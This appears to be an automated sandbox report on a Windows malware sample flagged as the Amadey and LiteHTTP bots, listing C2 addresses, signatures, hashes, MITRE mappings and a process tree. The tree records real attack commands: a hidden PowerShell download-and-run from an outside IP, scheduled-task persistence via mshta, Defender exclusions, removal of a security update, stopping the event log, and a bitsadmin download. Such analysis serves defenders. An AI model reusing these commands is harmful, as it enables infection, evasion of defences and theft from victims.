Overview

overview

10

Static

static

5

44c657fa4e...92.exe

windows7-x64

10

44c657fa4e...92.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 19:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe

  • Size

    938KB

  • MD5

    ab988dd02c8cea50ac224daf0e53f3e9

  • SHA1

    050ebd6e5d25d9b84b722dcea79b2243890c1652

  • SHA256

    44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192

  • SHA512

    c8c9044520c124e47ace7b53e1824c70b41792cb7cdde0ab272a936dce82fb567743f1b2a7fa506b6357005974b1f33f8fee3f595b5a366894971de0b6f9f1bd

  • SSDEEP

    24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:lTvC/MTQYxsWR7a0Q

Score
10/10
amadeylitehttp092155botdefense_evasiondiscoverydropperexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
    defense_evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Downloads MZ/PE file 12 IoCs
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 21 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 59 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
    "C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn HIuNAmaMLTb /tr "mshta C:\Users\Admin\AppData\Local\Temp\NsFniYaav.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn HIuNAmaMLTb /tr "mshta C:\Users\Admin\AppData\Local\Temp\NsFniYaav.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1800
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\NsFniYaav.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'B8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Users\Admin\AppData\Local\TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE
          "C:\Users\Admin\AppData\Local\TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2888
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2952
            • C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe
              "C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1676
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 640
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:5072
            • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe
              "C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2068
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 1196
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1044
            • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe
              "C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              PID:2008
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3452
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                7⤵
                  PID:3596
                  • C:\Windows\system32\wusa.exe
                    wusa /uninstall /kb:890830 /quiet /norestart
                    8⤵
                    • Drops file in Windows directory
                    PID:3800
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1748
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:912
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3612
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  7⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3632
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "DWENDQPG"
                  7⤵
                  • Launches sc.exe
                  PID:3720
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
                  7⤵
                  • Launches sc.exe
                  PID:3816
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  7⤵
                  • Launches sc.exe
                  PID:3936
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "DWENDQPG"
                  7⤵
                  • Launches sc.exe
                  PID:3952
              • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2888
                • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2120
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 1020
                    8⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:3356
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 500
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:3144
              • C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe
                "C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:4996
                • C:\Windows\Temp\{E2FD9876-5F5E-4B31-8C6B-D135A8C127AA}\.cr\Y87Oyyz.exe
                  "C:\Windows\Temp\{E2FD9876-5F5E-4B31-8C6B-D135A8C127AA}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=188
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1760
                  • C:\Windows\Temp\{B2F91470-22DE-4988-9D48-3B8E26438425}\.ba\SplashWin.exe
                    C:\Windows\Temp\{B2F91470-22DE-4988-9D48-3B8E26438425}\.ba\SplashWin.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1764
                    • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                      C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:2848
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        10⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:2800
                        • C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
                          C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
                          11⤵
                          • Loads dropped DLL
                          PID:4036
              • C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe
                "C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1928
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\vYKTGiNz\Anubis.exe""
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4188
              • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:2968
                • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:844
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 500
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:3188
              • C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
                "C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:4356
                • C:\Users\Admin\AppData\Local\Temp\onefile_4356_133856773552758000\chromium.exe
                  C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4992
              • C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe
                "C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:1584
              • C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe
                "C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4104
              • C:\Users\Admin\AppData\Local\Temp\10106350101\zY9sqWs.exe
                "C:\Users\Admin\AppData\Local\Temp\10106350101\zY9sqWs.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4432
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106361121\fCsM05d.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4592
                • C:\Windows\SysWOW64\fltMC.exe
                  fltmc
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4680
                • C:\Windows\SysWOW64\bitsadmin.exe
                  bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                  7⤵
                  • Download via BitsAdmin
                  • System Location Discovery: System Language Discovery
                  PID:4704
    • C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
      C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      PID:4040
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
          PID:4128
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
            • Drops file in Windows directory
            PID:4496
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4144
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4160
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:936
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4184
        • C:\Windows\system32\conhost.exe
          C:\Windows\system32\conhost.exe
          2⤵
            PID:4200
          • C:\Windows\explorer.exe
            explorer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4376

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        System Services

        2
        T1569

        Service Execution

        2
        T1569.002

        Persistence

        BITS Jobs

        1
        T1197

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Create or Modify System Process

        2
        T1543

        Windows Service

        2
        T1543.003

        Power Settings

        1
        T1653

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Create or Modify System Process

        2
        T1543

        Windows Service

        2
        T1543.003

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        BITS Jobs

        1
        T1197

        Impair Defenses

        1
        T1562

        Modify Registry

        3
        T1112

        Subvert Trust Controls

        1
        T1553

        Install Root Certificate

        1
        T1553.004

        Virtualization/Sandbox Evasion

        2
        T1497

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        3
        T1552

        Credentials In Files

        3
        T1552.001

        Discovery

        Browser Information Discovery

        1
        T1217

        Query Registry

        4
        T1012

        System Information Discovery

        2
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        Virtualization/Sandbox Evasion

        2
        T1497

        Lateral Movement

        Collection

        Data from Local System

        3
        T1005

        Command and Control

        Exfiltration

        Impact

        Service Stop

        1
        T1489

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
          Filesize

          71KB

          MD5

          83142242e97b8953c386f988aa694e4a

          SHA1

          833ed12fc15b356136dcdd27c61a50f59c5c7d50

          SHA256

          d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

          SHA512

          bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

          Download Submit

        • C:\Users\Admin\AppData\Local\TempB8OJ3BKP8KJDUR4I9TX0OSQAH8NXMFQU.EXE
          Filesize

          1.8MB

          MD5

          1ea9e7e7393e3bfdc50d8c613c1a7fb4

          SHA1

          79f3c21fb6de90dae7005202e69d71d0bef96028

          SHA256

          a5265bc009169c9d16c5571064b12e00428f1bb59bcd59f402ee90b5caa8b10a

          SHA512

          e20db7f8206a4a822bcdea638c2227fa7b2dd54f99d57ca77ef6a19fc7c6b1637e01423c29eb49a3f1be2efa79bbb976a80b3be50f858ba7766d27afc856713c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe
          Filesize

          1.3MB

          MD5

          dba9d78f396f2359f3a3058ffead3b85

          SHA1

          76c69c08279d2fbed4a97a116284836c164f9a8b

          SHA256

          ff07f07ed8d9ebf869603100b975c0e172d66e62973150e3e4b918e2faacf4b1

          SHA512

          6c97569c239a28b1f8be0e599fb587f19506896217650fcedc3900a066ad1ef93c5242390cec90ac3cdd921d7bdc357beb9e402a149250ef211baeaaee2a99e7

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe
          Filesize

          2.0MB

          MD5

          6006ae409307acc35ca6d0926b0f8685

          SHA1

          abd6c5a44730270ae9f2fce698c0f5d2594eac2f

          SHA256

          a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

          SHA512

          b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe
          Filesize

          5.0MB

          MD5

          ddab071e77da2ca4467af043578d080c

          SHA1

          226518a5064c147323482ac8db8479efd4c074f8

          SHA256

          d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c

          SHA512

          e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
          Filesize

          415KB

          MD5

          641525fe17d5e9d483988eff400ad129

          SHA1

          8104fa08cfcc9066df3d16bfa1ebe119668c9097

          SHA256

          7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a

          SHA512

          ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe
          Filesize

          5.7MB

          MD5

          5fb40d81dac830b3958703aa33953f4f

          SHA1

          8f4689497df5c88683299182b8b888046f38c86a

          SHA256

          b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc

          SHA512

          80b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe
          Filesize

          48KB

          MD5

          d39df45e0030e02f7e5035386244a523

          SHA1

          9ae72545a0b6004cdab34f56031dc1c8aa146cc9

          SHA256

          df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

          SHA512

          69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
          Filesize

          350KB

          MD5

          b60779fb424958088a559fdfd6f535c2

          SHA1

          bcea427b20d2f55c6372772668c1d6818c7328c9

          SHA256

          098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

          SHA512

          c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
          Filesize

          11.5MB

          MD5

          9da08b49cdcc4a84b4a722d1006c2af8

          SHA1

          7b5af0630b89bd2a19ae32aea30343330ca3a9eb

          SHA256

          215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

          SHA512

          579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe
          Filesize

          1.8MB

          MD5

          f155a51c9042254e5e3d7734cd1c3ab0

          SHA1

          9d6da9f8155b47bdba186be81fb5e9f3fae00ccf

          SHA256

          560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af

          SHA512

          67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe
          Filesize

          6.8MB

          MD5

          dab2bc3868e73dd0aab2a5b4853d9583

          SHA1

          3dadfc676570fc26fc2406d948f7a6d4834a6e2c

          SHA256

          388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

          SHA512

          3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106350101\zY9sqWs.exe
          Filesize

          361KB

          MD5

          2bb133c52b30e2b6b3608fdc5e7d7a22

          SHA1

          fcb19512b31d9ece1bbe637fe18f8caf257f0a00

          SHA256

          b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

          SHA512

          73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\10106361121\fCsM05d.cmd
          Filesize

          1KB

          MD5

          9e4466ae223671f3afda11c6c1e107d1

          SHA1

          438b65cb77e77a41e48cdb16dc3dee191c2729c7

          SHA256

          ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f

          SHA512

          3f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\NsFniYaav.hta
          Filesize

          717B

          MD5

          509d3d45424589e97da27e6501989b1d

          SHA1

          6ea34082dd885929187adcc1f9124e129b378d11

          SHA256

          10ecabf70e08cfb4522f21759637f0e657f0e5f827c8ffb4d8e27dffc105a1eb

          SHA512

